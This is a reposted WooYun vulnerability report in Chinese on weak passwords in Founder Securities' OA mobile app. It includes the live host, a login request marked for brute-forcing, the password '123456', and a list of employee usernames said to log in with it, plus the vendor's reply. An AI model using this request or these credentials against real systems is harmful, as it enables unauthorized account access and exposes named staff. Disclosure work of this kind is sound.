方正证券股份有限公司OA系统弱口令一打

admin 2017年4月9日23:15:24评论469 views字数 210阅读0分42秒阅读模式
摘要

2016-03-30: 细节已通知厂商并且等待厂商处理中
2016-03-30: 厂商已经确认,细节仅向厂商公开
2016-04-09: 细节向核心白帽子及相关领域专家公开
2016-04-19: 细节向普通白帽子公开
2016-04-29: 细节向实习白帽子公开
2016-05-14: 细节向公众公开

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2016-190850

漏洞标题: 方正证券股份有限公司OA系统弱口令一打

相关厂商: 方正证券股份有限公司

漏洞作者: 韶之恋

提交时间: 2016-03-30 20:11

公开时间: 2016-05-14 20:30

漏洞类型: 账户体系控制不严

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 弱口令

0人收藏


漏洞详情

披露状态:

2016-03-30: 细节已通知厂商并且等待厂商处理中
2016-03-30: 厂商已经确认,细节仅向厂商公开
2016-04-09: 细节向核心白帽子及相关领域专家公开
2016-04-19: 细节向普通白帽子公开
2016-04-29: 细节向实习白帽子公开
2016-05-14: 细节向公众公开

简要描述:

详细说明:

AppStore下载方正证券OA App,登陆接口可以爆破

问题数据包:

code 区域
POST /FzoaRequestHelp/rootAction.do HTTP/1.1
Host: nmoa.foundersc.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Content-Length: 440
Accept-Language: zh-cn
Accept: */*
Connection: keep-alive
User-Agent: FZOA1/7.0.8 CFNetwork/758.3.15 Darwin/15.4.0

<?xml version='1.0' encoding='utf-8' ?><request><action id="login"><param key="hasencrypt">true</param><param key='username' >§wangwei§</param><param key="password">%40S%4054%40E%40%40S%4055%40E%40%40S%4056%40E%40%40S%4057%40E%40%40S%4058%40E%40%40S%4059%40E%40</param><param key='model'>iPhone</param><param key='systemVersion'>9.3</param><param key='uniqueIdentifier'>020000000000</param><param key='token'>(null)</param></action></request>

弱口令:123456(以下均可登陆)

451 yangxiuzhen 200 false false 1233

274 wanghaiyan 200 false false 1232

220 lijianhua 200 false false 1231

226 zhangshuai 200 false false 1229

187 zhangting 200 false false 1228

472 zhangrong 200 false false 1228

197 zhanglin 200 false false 1227

208 zhangxue 200 false false 1227

225 wangqian 200 false false 1227

240 liuchang 200 false false 1227

321 wangdong 200 false false 1227

440 zhanglin 200 false false 1227

94 wangxin 200 false false 1226

101 wangbin 200 false false 1226

150 yangjie 200 false false 1226

157 wanghua 200 false false 1226

265 chenhua 200 false false 1226

281 chenlei 200 false false 1226

285 wangrui 200 false false 1226

411 wangbin 200 false false 1226

429 yangxue 200 false false 1226

436 wangxin 200 false false 1226

37 liyong 200 false false 1225

39 liujie 200 false false 1225

65 liutao 200 false false 1225

207 wangxu 200 false false 1225

315 liukai 200 false false 1225

318 liuhua 200 false false 1225

漏洞证明:

方正证券股份有限公司OA系统弱口令一打

方正证券股份有限公司OA系统弱口令一打

方正证券股份有限公司OA系统弱口令一打

修复方案:

加强员工安全意识,企业内用App不要上架

版权声明:转载请注明来源 韶之恋@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2016-03-30 20:27

厂商回复:

我公司已知悉此漏洞,因系统结构太老无法修补。新系统即将上线。内部已发相关通告

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin